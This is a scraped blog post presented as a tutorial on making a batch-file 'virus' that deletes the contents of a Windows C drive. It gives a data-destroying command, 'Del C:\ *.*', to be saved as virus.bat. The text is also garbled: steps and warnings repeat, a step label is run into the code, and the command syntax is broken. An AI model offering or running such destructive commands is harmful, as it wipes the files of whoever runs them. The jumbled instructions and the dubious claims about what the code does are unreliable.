How To Create A Virus That Delete Windows
https://only4hacker.blogspot.com/2016/02/how-to-create-virus-that-delete-windows.html
--ads--
In this article I will show you how to create a virus that delete windows by following steps:
Step-1:
Just open notepad or any text editor.
Step-2:
Now copy and paste the following code below into the notepad.
Now save it as virus.bat ( where, virus is a file name and “. bat” is the file extension ).
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
Now copy and paste the following code below into the notepad.
@Echo offStep-3:
Del C:\ *.* |y
Now save it as virus.bat ( where, virus is a file name and “. bat” is the file extension ).
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.